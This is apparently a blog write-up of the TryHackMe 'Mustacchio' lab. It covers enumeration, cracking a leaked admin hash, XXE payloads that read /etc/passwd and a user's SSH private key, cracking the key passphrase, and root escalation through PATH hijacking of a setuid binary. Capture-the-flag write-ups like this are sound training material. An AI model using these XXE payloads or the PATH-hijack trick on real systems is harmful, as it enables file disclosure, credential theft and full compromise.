Featured image of post TryHackMe: Mustacchio Writeup
TryHackMe

TryHackMe: Mustacchio Writeup

Learn about hash-cracking and a good deal of XXE attacks. Add some path hijacking to it!

Play

1. Scanning & Enumeration

We do the below scans in parallel.

1.1. Port Scanning

Not shown: 998 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 d3:9e:50:66:5f:27:a0:60:a7:e8:8b:cb:a9:2a:f0:19 (RSA)
|   256 5f:98:f4:5d:dc:a1:ee:01:3e:91:65:0a:80:52:de:ef (ECDSA)
|_  256 5e:17:6e:cd:44:35:a8:0b:46:18:cb:00:8d:49:b3:f6 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Mustacchio | Home
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Info Gathered:

  • SSH open on 22
  • Post 80 with a website open

More information gathered later, as the full port scan takes a lot longer.

Not shown: 65532 filtered ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
8765/tcp open  ultraseek-http

We could explore the last port later.

1.2. Web Enumeration

┌──(kali㉿kali)-[~]
└─$ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x 'php,html,txt' -t 32 -q -u 10.10.247.224
/images               (Status: 301) [Size: 315] [--> http://10.10.247.224/images/]
/about.html           (Status: 200) [Size: 3152]                                  
/contact.html         (Status: 200) [Size: 1450]                                  
/index.html           (Status: 200) [Size: 1752]                                  
/blog.html            (Status: 200) [Size: 3172]                                  
/gallery.html         (Status: 200) [Size: 1950]                                  
/custom               (Status: 301) [Size: 315] [--> http://10.10.247.224/custom/]
/robots.txt           (Status: 200) [Size: 28]                                    
/fonts                (Status: 301) [Size: 314] [--> http://10.10.247.224/fonts/] 
/server-status        (Status: 403) [Size: 278]

Info gathered:

  • custom looks interesting
  • robots.txt usually contains intersting information

1.3. Web Exploration

The homepage. mustacchio homepage

We explore the /custom/ page, and get another /js/ directory onwards. mustacchio custom js webpage

I first looked in users.bak. We get something interesting!

┌──(kali㉿kali)-[/tmp]
└─$ cat users.bak              
��r�CtableusersusersCREATE TABLE "users" (
        "id"    INTEGER,
        "username"      TEXT,
        "password"      TEXT,
        "role"  INTEGER
��2     ]admin{hash_was_here_and_i_hid_it_lol}

1.4. Hash Cracking

Looks like a hash for the username admin. But, of what kind?

┌──(kali㉿kali)-[/tmp]
└─$ hashid {hash_was_here_and_i_hid_this_too}   
Analyzing '{yeee_hawww}'
[+] SHA-1 
[+] Double SHA-1 
[+] RIPEMD-160 
[+] Haval-160 
[+] Tiger-160 
[+] HAS-160 
[+] LinkedIn 
[+] Skein-256(160) 
[+] Skein-512(160)

Using john the ripper, we get the password XD

┌──(kali㉿kali)-[/tmp]
└─$ ssh admin@10.10.247.224
The authenticity of host '10.10.247.224 (10.10.247.224)' can't be established.
ECDSA key fingerprint is SHA256:g//RSEsVCZF6FIydF0R24Gmek8fI6D7kRnDXF3fNK9Y.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.247.224' (ECDSA) to the list of known hosts.
admin@10.10.247.224: Permission denied (publickey).

And … we see that we are not allowed :( At this point, we have one last option left.

1.5. The Mystery Port & Our Key to Success

Exploring the last port, we get some more information.

PORT     STATE SERVICE VERSION
8765/tcp open  http    nginx 1.10.3 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET HEAD POST
|_http-server-header: nginx/1.10.3 (Ubuntu)
|_http-title: Mustacchio | Login
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Let’s go!

admin panel on the new port found

We see an admin panel! Recall, we already have the credentials :D

a place to add comments in the admin panel

We see the following in the source code. <!-- Barry, you can now SSH in using your key!-->

Now what?

1.6. XML

I opened up burp-suite, and I got the following.

POST /home.php HTTP/1.1
Host: 10.10.247.224:8765
...
Connection: close

xml=wow

We have a comment box that looks like a place to enter XML text, as we see in the POST request.

Let’s try:

<?xml version="1.0" encoding="UTF-8"?>
<root>

        <author>hacc</author>
        <name>Hackerman</name>
</root>

getting shady xml code to work

Ey, Voila!

I looked around, and I got OWASP XXE.

Now, we can craft a special tasty XXE attack.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE author [<!ENTITY read SYSTEM 'file:///etc/passwd'>]>
<root><author>&read;</author></root>

Explaination:

  • The first line is prolog
  • The second line specifies something of author, containing the information of the system file /etc/passwd in a variable called read.
  • When we ask to display the author, we can put the &read; in between the tags. This then prints the desired output.

admin panel displaying the /etc/passwd

1.7. SSH Keys

Using the above listing, we find two users, joe and barry. We see the hint given to us in the source code, to login SSH using Barry as username.

We can modify the request as such:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE author [<!ENTITY read SYSTEM 'file:///home/barry/.ssh/id_rsa'>]>
<root>
<author>&read;</author>
</root>

And we can get the private key! Use chmod 600 id_rsa to assign appropriate permissions.

2. Foothold

Trying the key, we see that we need a passphrase. We can use ssh2john for this.

┌──(kali㉿kali)-[/tmp]
└─$ locate ssh2john
/usr/share/john/ssh2john.py

┌──(kali㉿kali)-[/tmp]
└─$ /usr/share/john/ssh2john.py id_rsa > hash
       
┌──(kali㉿kali)-[/tmp]
└─$ john hash --wordlist=/usr/share/wordlists/rockyou.txt                    
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 6 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
{passphrase}       (id_rsa)
1g 0:00:00:03 DONE (2021-06-12 10:53) 0.2754g/s 3950Kp/s 3950Kc/s 3950KC/s     1990..*7¡Vamos!
Session completed

Let’s login!

┌──(kali㉿kali)-[/tmp]
└─$ ssh -i id_rsa barry@10.10.237.166
Enter passphrase for key 'id_rsa': 
Welcome to Ubuntu 16.04.7 LTS (GNU/Linux 4.4.0-210-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

13 packages can be updated.
10 of these updates are security updates.
To see these additional updates run: apt list --upgradable


Last login: Sat Jun 12 13:20:56 2021 from 10.17.8.184
barry@mustacchio:~$

3. PrivEsc

Okay now what? Sudo we can’t touch. Crontab empty. Linux kernel tip top. SUID?

barry@mustacchio:~$ find / -type f -perm -u=s 2> /dev/null
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/snapd/snap-confine
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/passwd
/usr/bin/pkexec
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/at
/usr/bin/chsh
/usr/bin/newgidmap
/usr/bin/sudo
/usr/bin/newuidmap
/usr/bin/gpasswd
/home/joe/live_log
/bin/ping
/bin/ping6
/bin/umount
/bin/mount
/bin/fusermount
/bin/su

Okay. So, home/joe/live_log shows us the following.

barry@mustacchio:~$ file /home/joe/live_log
/home/joe/live_log: setuid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=6c03a68094c63347aeb02281a45518964ad12abe, for GNU/Linux 3.2.0, not stripped

Okay, let’s execute.

barry@mustacchio:~$ /home/joe/live_log
10.17.8.184 - - [12/Jun/2021:09:09:41 +0000] "POST /home.php HTTP/1.1" 200 1123 "http://mustacchio.thm:8765/home.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36"
10.17.8.184 - - [12/Jun/2021:09:09:47 +0000] "POST /home.php HTTP/1.1" 200 1123 "http://mustacchio.thm:8765/home.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36"
...

^CLive Nginx Log

It says it is Live Nginx Log. We clearly need more information. What about the strings in the executable?

...
Live Nginx Log Reader
tail -f /var/log/nginx/access.log
...
crtstuff.c
...
demo.c
...

Looks closely! We have tail present. This is now a simle PATH epxloit. 2 Simple steps.

  1. We add the current path in the PATH environment variable.
  2. We create an executable called tail

Step 1:

barry@mustacchio:~$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
barry@mustacchio:~$ export PATH=$PWD:$PATH
barry@mustacchio:~$ echo $PATH
/home/barry:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin

Step 2:

barry@mustacchio:~$ cat tail
#!/usr/bin/python3
import pty
pty.spawn("/bin/bash")

barry@mustacchio:~$ chmod +x tail
barry@mustacchio:~$ /home/joe/live_log
root@mustacchio:~#

System Compromised!

© 2020 - 2021 Tanishq Chaudhary
Built with Hugo
Theme Stack designed by Jimmy